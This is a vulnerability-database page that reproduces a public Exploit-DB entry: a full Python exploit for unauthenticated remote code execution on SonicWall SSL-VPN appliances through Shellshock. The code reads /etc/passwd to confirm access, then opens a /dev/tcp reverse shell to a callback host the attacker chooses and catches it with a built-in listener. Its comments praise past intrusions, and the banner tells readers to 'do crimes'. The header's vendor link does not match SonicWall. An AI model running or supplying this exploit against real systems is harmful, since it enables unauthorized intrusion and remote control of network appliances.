Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

SonicWall SSL-VPN 8.0.0.0 - 'visualdoor' Remote Code Execution (Unauthenticated)

🗓️ 29 Jan 2021 00:00:00Reported by Darren MartynType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 338 Views

SonicWall SSL-VPN 8.0.0.0 'visualdoor' Remote Code Executio

Code
# Exploit Title: SonicWall SSL-VPN 8.0.0.0 - 'shellshock/visualdoor' Remote Code Execution (Unauthenticated)
# Exploit Author: Darren Martyn
# Vendor Homepage: https://www.home-assistant.io/
# Version: < SMA 8.0.0.4
# Blog post: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/

#!/usr/bin/python
# coding: utf-8
# Author: Darren Martyn
# Credit: Phineas Fisher
# Notes:
# This exploit basically implements the exploits Phineas Fisher used to pwn Hacking Team 
# and the Cayman Trust Bank place. It uses the Shellshock vulnerability to gain a command
# execution primitive as the "nobody" user in the cgi-bin/jarrewrite.sh web-script, spawns
# a trivial reverse shell using /dev/tcp.
# There is a fairly trivial LPE in these that gets you root by abusing setuid dos2unix, but
# implementing that is left as an exercise for the reader. I've seen a few approaches, and 
# would be interested in seeing yours.
# There is another LPE that works only on some models which I also have removed from this.
# Details: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
import requests
import sys
import telnetlib
import socket
from threading import Thread
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
import time

def banner():
    print """
                                                         
             88                                      88  
             ""                                      88  
                                                     88  
8b       d8  88  ,adPPYba,  88       88  ,adPPYYba,  88  
`8b     d8'  88  I8[    ""  88       88  ""     `Y8  88  
 `8b   d8'   88   `"Y8ba,   88       88  ,adPPPPP88  88  
  `8b,d8'    88  aa    ]8I  "8a,   ,a88  88,    ,88  88  
    "8"      88  `"YbbdP"'   `"YbbdP'Y8  `"8bbdP"Y8  88  
                                                         
                                                         
                                                         
             88                                          
             88                                          
             88                                          
     ,adPPYb,88   ,adPPYba,    ,adPPYba,   8b,dPPYba,    
    a8"    `Y88  a8"     "8a  a8"     "8a  88P'   "Y8    
    8b       88  8b       d8  8b       d8  88            
    "8a,   ,d88  "8a,   ,a8"  "8a,   ,a8"  88            
     `"8bbdP"Y8   `"YbbdP"'    `"YbbdP"'   88   
    SonicWall SSL-VPN Appliance Remote Exploit
Public Release (Jan 2021). Author: Darren Martyn. Credit
goes to Phineas Fisher for this. Stay inside, do crimes.
    """ 

def handler(lp): # handler borrowed from Stephen Seeley.
    print "(+) starting handler on port %d" %(lp)
    t = telnetlib.Telnet()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0", lp))
    s.listen(1)
    conn, addr = s.accept()
    print "(+) connection from %s" %(addr[0])
    t.sock = conn
    print "(+) pop thy shell!"
    t.interact()

def execute_command(target, command):
    url = target + "/cgi-bin/jarrewrite.sh"
    headers = {"User-Agent": "() { :; }; echo ; /bin/bash -c '%s'" %(command)}
    r = requests.get(url=url, headers=headers, verify=False)
    return r.text

def check_exploitable(target):
    print "(+) Testing %s for pwnability..." %(target)
    output = execute_command(target=target, command="cat /etc/passwd")
    if "root:" in output:
        print "(*) We can continue, time to wreck this shit."
        return True
    else:
        return False

def pop_reverse_shell(target, cb_host, cb_port):
    print "(+) Sending callback to %s:%s" %(cb_host, cb_port)
    backconnect = "nohup bash -i >& /dev/tcp/%s/%s 0>&1 &" %(cb_host, cb_port)
    execute_command(target=target, command=backconnect)

def hack_the_planet(target, cb_host, cb_port):
    if check_exploitable(target) == True:
        pass
    else:
        sys.exit("(-) Target not exploitable...")
    handlerthr = Thread(target=handler, args=(int(cb_port),))
    handlerthr.start()
    pop_reverse_shell(target=target, cb_host=cb_host, cb_port=cb_port)

def main(args):
    banner()
    if len(args) != 4:
        sys.exit("use: %s https://some-vpn.lol:8090 hacke.rs 1337" %(args[0]))
    hack_the_planet(target=args[1], cb_host=args[2], cb_port=args[3])

if __name__ == "__main__":
    main(args=sys.argv)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 Jan 2021 00:00Current
7.4High risk
Vulners AI Score7.4
exploitssl-vpnremote code executionshellshockphineas fisherhacking teamcayman trust bankvulnerabilityreverse shellcommand executioncgi scriptlpedarren martynvendor homepagesma 8.0.0.4
338